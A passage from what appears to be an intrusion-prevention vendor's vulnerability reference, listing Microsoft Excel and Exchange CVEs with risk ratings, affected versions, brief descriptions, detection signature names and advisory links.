File-OLE_Microsoft-Excel-Ptgextraarray-Parsing-Memory-Corruption
References:
CVE-2010-3239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3239
BID-43654
http://www.securityfocus.com/bid/43654
MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080
Back to top

Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2002; Microsoft Excel 2007; Microsoft Excel Viewer
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: HTTP_SS-Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240
File-OLE_Microsoft-Excel-Real-Time-Data-Array-Record-CVE-2010-3240
References:
CVE-2010-3240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3240
MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080
Back to top

Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-292-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2002
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Excel.
Situation: HTTP_SS-Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257
File-OLE_Microsoft-Excel-Record-Memory-Corruption-CVE-2010-0257
References:
CVE-2010-0257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0257
MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017
Back to top

Microsoft-Excel-Record-Memory-Corruption-CVE-2011-3403

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Excel detected
Risk: Moderate
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Excel detected
Situation: File-OLE_Microsoft-Excel-Record-Memory-Corruption-CVE-2011-3403
References:
CVE-2011-3403
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3403
MS11-096
http://technet.microsoft.com/security/bulletin/MS11-096
Back to top

Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-347-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel 2002
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: HTTP_SS-Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230
File-OLE_Microsoft-Excel-Record-Parsing-Integer-Overflow-CVE-2010-3230
References:
CVE-2010-3230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3230
MS10-080
http://technet.microsoft.com/security/bulletin/MS10-080
Back to top

Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101

About this vulnerability: An attempt to exploit Excel vulnerability CVE-2011-01010
Risk: Moderate
First detected in: sgpkg-ips-386-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel record parsing may lead to code execution
Situation: HTTP_SS-Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101
File-OLE_Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101
References:
CVE-2011-0101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0101
BID-47243
http://www.securityfocus.com/bid/47243
OSVDB-71766
http://www.osvdb.org/71766
MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021
Back to top

Microsoft-Excel-Rept-Function-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office Compatibility Pack; Microsoft Office SharePoint Server; Microsoft Open XML File Format Converter; Microsoft Office; Microsoft Office System
Type: Integer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Excel. The vulnerability is due to improper parsing of Excel documents containing specially crafted REPT function. Remote attackers can exploit this vulnerability by enticing target users to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Excel-Rept-Function-Integer-Overflow
File-OLE_Microsoft-Excel-Rept-Function-Integer-Overflow
File-TextId_Microsoft-Excel-Rept-Function-Integer-Overflow
References:
CVE-2008-4019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4019
BID-31706
http://www.securityfocus.com/bid/31706
MS08-057
http://technet.microsoft.com/security/bulletin/MS08-057
Back to top

Microsoft-Excel-Rich-Text-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office; Microsoft Office Compatibility Pack; Microsoft Excel Viewer
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Microsoft Excel. The vulnerability is due to boundary error when processing SST records. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged-in user.
Situation: File-OLE_Microsoft-Excel-Rich-Text-Handling-Code-Execution
References:
CVE-2008-0116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0116
BID-28168
http://www.securityfocus.com/bid/28168
MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014
Back to top

Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Excel. The memory corrution happens when Excel attempts to open files that contain invalid values within the rtWindow1 records. A remote attacker can exploit this vulnerability by persuading a target user to open a specially crafted XLS file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.
Situation: HTTP_Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution
File-OLE_Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution
References:
CVE-2007-3029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3029
BID-22555
http://www.securityfocus.com/bid/22555
OSVDB-35958
http://www.osvdb.org/35958
MS07-036
http://technet.microsoft.com/security/bulletin/MS07-036
Back to top

Microsoft-Excel-Security-Feature-Bypass

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Excel detected
Risk: High
First detected in: sgpkg-ips-1402-5242
Last changed: sgpkg-ips-1402-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Excel detected.
Situation: File-TextId_Microsoft-Excel-Security-Feature-Bypass
References:
CVE-2021-42292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42292
Back to top

Microsoft-Excel-SerAuxErrBar-Heap-Overflow

About this vulnerability: A vulnerability in Microsoft Excelr
Risk: High
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Microsoft Excel 2003; Microsoft Excel 2007; Microsoft Excel 2010; Microsoft Excel 2008 for Mac; Microsoft Office Compatibility Pack
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: File-OLE_Microsoft-Excel-SerAuxErrBar-Heap-Overflow
References:
CVE-2012-1885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1885
BID-56425
http://www.securityfocus.com/bid/56425
OSVDB-87270
http://www.osvdb.org/87270
MS12-076
http://technet.microsoft.com/security/bulletin/MS12-076
Back to top

Microsoft-Excel-Set-Font-Handling-Code-Execution

About this vulnerability: A buffer overflow vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Malfunction
Description: There is a buffer overflow vulnerability in Microsoft Excel. The vulnerability is a result of insufficient boundary checking while processing FBI (Font Basis Info) record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: File-OLE_Microsoft-Excel-Set-Font-Handling-Code-Execution
References:
CVE-2007-1203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1203
BID-23779
http://www.securityfocus.com/bid/23779
OSVDB-34394
http://www.osvdb.org/34394
MS07-023
http://technet.microsoft.com/security/bulletin/MS07-023
Back to top

Microsoft-Excel-SLK-Payload-Delivery

About this vulnerability: A vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Insecure Configuration
Description: A vulnerability in Microsoft Excel that allows remote attackers to download and execute malicious payloads on target systems by enticing the user to open an .SKL Excel spreadsheet containing Powershell commands.
Situation: File-Text_Microsoft-Excel-SLK-Payload-Delivery
Back to top

Microsoft-Excel-Sst-Invalid-Length-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Excelr
Risk: High
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Mac OS X
Software: Microsoft Excel 2008 for Mac; Microsoft Excel 2011 for Mac; Microsoft Excel 2003; Microsoft Excel 2007; Microsoft Excel 2010; Microsoft Office Compatibility Pack
Type: Input Validation
Description: There is a vulnerability in Microsoft Excel.
Situation: File-OLE_Microsoft-Excel-Sst-Invalid-Length-Use-After-Free
References:
CVE-2012-1887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1887
BID-56430
http://www.securityfocus.com/bid/56430
OSVDB-87272
http://www.osvdb.org/87272
MS12-076
http://technet.microsoft.com/security/bulletin/MS12-076
Back to top

Microsoft-Excel-Style-Record-Data-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-385-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Office
Type: Malfunction
Description: There exists a code execution vulnerability in Microsoft Excel. The vulnerability is due to improper parsing of the Style record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_SS-Microsoft-Excel-Style-Record-Data-Handling-Code-Execution
File-OLE_Microsoft-Excel-Style-Record-Data-Handling-Code-Execution
References:
CVE-2008-0114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0114
BID-28166
http://www.securityfocus.com/bid/28166
MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014
Back to top

Microsoft-Excel-SXLI-Record-Memory-Corruption-Vulnerability

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-451-4333
Last changed: sgpkg-ips-1396-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Excel
References:
CVE-2012-0184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0184
BID-53375
http://www.securityfocus.com/bid/53375
MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030
Back to top

Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-320-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel.
Situation: E-Mail_BS-Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
HTTP_SS-Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
File-OLE_Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
References:
CVE-2010-0821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0821
BID-40518
http://www.securityfocus.com/bid/40518
OSVDB-65227
http://www.osvdb.org/65227
MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038
Back to top

Microsoft-Excel-Txo-And-Obj-Records-Parsing-Stack-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Office
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Excel. The flaw is due to improper handling of crafted XLS documents. An attacker can persuade the target user to open a malicious XLS document to exploit this vulnerability. Successful attack could allow for arbitrary code injection and execution with privileges of the currently logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.
Situation: File-OLE_Microsoft-Excel-Txo-And-Obj-Records-Parsing-Stack-Memory-Corruption
References:
CVE-2008-4265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4265
BID-32618
http://www.securityfocus.com/bid/32618
MS08-074
http://technet.microsoft.com/security/bulletin/MS08-074
Back to top

Microsoft-Excel-Type-Mismatch-Series-Record-Parsing-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Excel. The vulnerability is due to a type mismatch during Series record parsing. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted Excel document. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user.
Situation: File-OLE_Microsoft-Excel-Type-Mismatch-Series-Record-Parsing-Memory-Corruption
References:
CVE-2012-1847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1847
OSVDB-81724
http://www.osvdb.org/81724
MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030
Back to top

Microsoft-Excel-Use-After-Free-WriteAV-Vulnerability

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1396-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: A vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-Use-After-Free-WriteAV-Vulnerability
References:
CVE-2011-1986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1986
MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072
Back to top

Microsoft-Excel-Version-Information-Handling-Code-Execution

About this vulnerability: Memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is a result of insufficient data validation while processing the Version Number field in a BOF record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_Microsoft-Excel-Version-Information-Handling-Code-Execution
File-OLE_Microsoft-Excel-Version-Information-Handling-Code-Execution
References:
CVE-2007-1756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1756
BID-24801
http://www.securityfocus.com/bid/24801
OSVDB-35957
http://www.osvdb.org/35957
MS07-036
http://technet.microsoft.com/security/bulletin/MS07-036
Back to top

Microsoft-Excel-Window2-Record-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-425-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel
Type: Malfunction
Description: A code execution vulnerability has been identified in Microsoft Excel. The vulnerability is due to an use after free error while parsing Window2 record in Excel files. The vulnerability can be exploited by enticing a user to open a crafted file and perform certain actions. If exploited successfully, the vulnerability could permit execution of arbitrary code in the security context of the target user. At the time of writing, no patch or advisory regarding this issue is available from Microsoft.
Situation: File-OLE_Microsoft-Excel-Window2-Record-Use-After-Free
References:
OSVDB-76840
http://www.osvdb.org/76840
Back to top

Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution

About this vulnerability: A memory corruption vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Excel; Microsoft Excel Viewer
Type: Input Validation
Description: There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is a result of insufficient data validation while processing the SubStreamType field in a BOF record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution
File-OLE_Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution
References:
CVE-2007-3030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3030
BID-24803
http://www.securityfocus.com/bid/24803
OSVDB-35959
http://www.osvdb.org/35959
MS07-036
http://technet.microsoft.com/security/bulletin/MS07-036
Back to top

Microsoft-Excel-Workspace-Index-Value-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Excel
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel; Microsoft Excel Viewer; Microsoft Office
Type: Malfunction
Description: There exists a memory corruption vulnerability in the way Microsoft Excel processes files. The vulnerability is a result of insufficient data validation while processing an index value in a certain BIFF record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Excel will terminate resulting in the loss of any unsaved data from the current session.
Situation: File-Binary_Microsoft-Excel-Workspace-Index-Value-Memory-Corruption
References:
CVE-2007-3890
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3890
BID-25280
http://www.securityfocus.com/bid/25280
MS07-044
http://technet.microsoft.com/security/bulletin/MS07-044
Back to top

Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278

About this vulnerability: An attempt to exploit vulnerability in Microsoft Excel detected
Risk: Moderate
First detected in: sgpkg-ips-399-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Malfunction
Description: Vulnerability in Microsoft Excel
Situation: HTTP_SS-Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278
File-OLE_Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278
References:
CVE-2011-1278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1278
BID-48163
http://www.securityfocus.com/bid/48163
MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045
Back to top

Microsoft-Exchange-Addtenantdlppolicy-Ruleparameters-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: Improper handling of ruleParameters tag in a DLP policy template causes a vulnerability in Microsoft Exchange Server. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Microsoft-Exchange-Addtenantdlppolicy-Ruleparameters-Remote-Code-Execution
References:
CVE-2021-26412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26412
Back to top

Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the TNEF decoding in Microsoft Exchange and Outlook
Risk: High
First detected in: sgpkg-ips-54-1210
Last changed: sgpkg-ips-1730-5242
Platform: Windows
Software: Exchange Server 5.0; Exchange Server 5.5; Exchange Server 2000; Microsoft Outlook
Type: Buffer Overflow
Description: Microsoft Exchange Server and Microsoft Outlook have a buffer overflow vulnerability in the handling of TNEF encoded messages. When a TNEF object record with a large size value is processed by these products, an integer overflow can occur. A remote attacker is able to exploit this vulnerability via a specially crafted email to execute arbitrary code on the victim machine.
Situation: E-Mail_HCS-Microsoft-Exchange-And-Outlook-TNEF-Encoding
E-Mail_BS-Microsoft-Exchange-And-Outlook-TNEF-Decoding-Buffer-Overflow
File-Binary_Clam-AntiVirus-TNEF-Decoding-Denial-Of-Service
References:
CVE-2006-0002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0002
BID-16197
http://www.securityfocus.com/bid/16197
MS06-003
http://technet.microsoft.com/security/bulletin/MS06-003
Back to top

Microsoft-Exchange-Approvedapplication-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: File-TextId_Microsoft-Exchange-Approvedapplication-Insecure-Deserialization
References:
CVE-2023-36756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36756
ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep
Back to top

Microsoft-Exchange-Authentication-Bypass-CVE-2021-33766

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Exchange detected
Risk: High
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1383-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Exchange Authentication Bypass CVE-2021-33766 detected.
Situation: HTTP_CSH-Microsoft-Exchange-Authentication-Bypass-CVE-2021-33766
References:
CVE-2021-33766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33766
Back to top

Microsoft-Exchange-Calendar-Code-Execution

About this vulnerability: Microsoft Exchange Calendar Code Execution
Risk: Moderate
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server 2000; Exchange Server 2003
Type: Buffer Overflow
Description: Microsoft Exchange Server 2000 and 2003 remote compromise via malformed calendar object.
Situation: E-Mail_BS-Microsoft-Exchange-Calendar-Code-Execution
IMAP_Microsoft-Exchange-Calendar-Code-Execution
POP3_CS-Microsoft-Exchange-Calendar-Code-Execution
File-TextId_Microsoft-Exchange-Calendar-Code-Execution
References:
CVE-2006-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0027
BID-17908
http://www.securityfocus.com/bid/17908
OSVDB-25338
http://www.osvdb.org/25338
MS06-019
http://technet.microsoft.com/security/bulletin/MS06-019
Back to top

Microsoft-Exchange-CVE-2020-16875-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: A memory corruption vulnerability has been reported in Microsoft Exchange. The vulnerability is due to improper handling of due to improper validation of cmdlet arguments. An authenticated, remote attacker can exploit this vulnerability by running a particular cmdlet with crafted arguments against a vulnerable Exchange server. Successful exploitation could result in the execution of arbitrary commands as SYSTEM.
Situation: File-TextId_Microsoft-Exchange-RCE-Multiple-Vulnerabilities
References:
CVE-2020-16875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16875
ms20-sep
http://technet.microsoft.com/security/bulletin/ms20-sep
Back to top

Microsoft-Exchange-CVE-2021-26858-Arbitrary-File-Write

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1342-5242
Last changed: sgpkg-ips-1342-5242
Platform: Windows
Software: Exchange Server
Type: Directory Traversal
Description: Improper handling of Offline Address Book stores causes an arbitrary file write vulnerability in Microsoft Exchange.
Situation: HTTP_CRL-Microsoft-Exchange-CVE-2021-26858-Arbitrary-File-Write
References:
CVE-2021-26858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858
Back to top

Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1621-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: There exists an arbitrary file write vulnerability in Microsoft Exchange. Successful exploitation allows an attacker to write arbitrary file on the target server.
Situation: HTTP_CS-Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write
HTTP_CS-Microsoft-Exchange-CVE-2021-27065-Arbitrary-File-Write-2
References:
CVE-2021-27065
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065
Back to top

Microsoft-Exchange-Deserialization-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Exchange detected
Risk: High
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Exchange detected.
Situation: File-TextId_Microsoft-Exchange-Deserialization-Remote-Code-Execution
References:
CVE-2021-42321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321
Back to top

Microsoft-Exchange-Outlook-Compressed-RTF-Parsing-Memory-Corruption

About this vulnerability: Maliciously crafted email could comproise vulnerable Outlook client
Risk: High
First detected in: sgpkg-ips-339-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook
Type: Malfunction
Description: A vulnerability in compressed RTF parsing allows remote attacker to craft malicious emails that could contain automatically executed malcode when opened via Outlook
Situation: E-Mail_Compressed-TNEF-RTF-Memory-Corruption
File-Binary_Microsoft-Outlook-Compressed-TNEF-RTF-Memory-Corruption
References:
CVE-2010-2728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2728
MS10-064
http://technet.microsoft.com/security/bulletin/MS10-064
Back to top

Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213

About this vulnerability: A cross-site request forgery vulnerability in Microsoft Exchange Server
Risk: Critical
First detected in: sgpkg-ips-338-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: There is a cross-site request forgery vulnerability in Microsoft Exchange Server.
Situation: HTTP_SS-Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213
File-Text_Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213
References:
CVE-2010-3213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3213
BID-41462
http://www.securityfocus.com/bid/41462
Back to top

Microsoft-Exchange-OWA-XSS-Spoofing

About this vulnerability: A vulnerability in Microsoft Exchange
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1661-5242
Platform: Windows
Software: Exchange Server 5.5
Type: Cross-site Scripting
Description: There is vulnerability in Microsoft Outlook Web Access, a component of Microsoft Exchange, in the validation of user input. This vulnerability could allow a malicious user to conduct cross-site scripting and spoofing attacks against other users of the web access service.
References:
CVE-2004-0203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0203
MS04-026
http://technet.microsoft.com/security/bulletin/MS04-026
Back to top

Microsoft-Exchange-Post-Auth-Arbitrary-File-Write-CVE-2021-31207

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Exchange detected
Risk: High
First detected in: sgpkg-ips-1379-5242
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Exchange detected.
Situation: HTTP_CRL-Microsoft-Exchange-Post-Auth-Arbitrary-File-Write-CVE-2021-31207-2
References:
CVE-2021-31207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207
Back to top

Microsoft-Exchange-PowerShell-Backend-EOP-CVE-2021-34523

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Exchange detected
Risk: High
First detected in: sgpkg-ips-1379-5242
Last changed: sgpkg-ips-1379-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Exchange detected.
Situation: HTTP_CSU-Microsoft-Exchange-PowerShell-Backend-EOP-CVE-2021-34523
References:
CVE-2021-34523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523
Back to top

Microsoft-Exchange-PowerShell-Insecure-Deserialization-CVE-2023-21707

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1591-5242
Last changed: sgpkg-ips-1599-5242
Platform: Windows
Software: Microsoft Exchange Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: File-TextId_Microsoft-Exchange-Unsafe-Deserialization
References:
CVE-2023-21707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21707
ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb
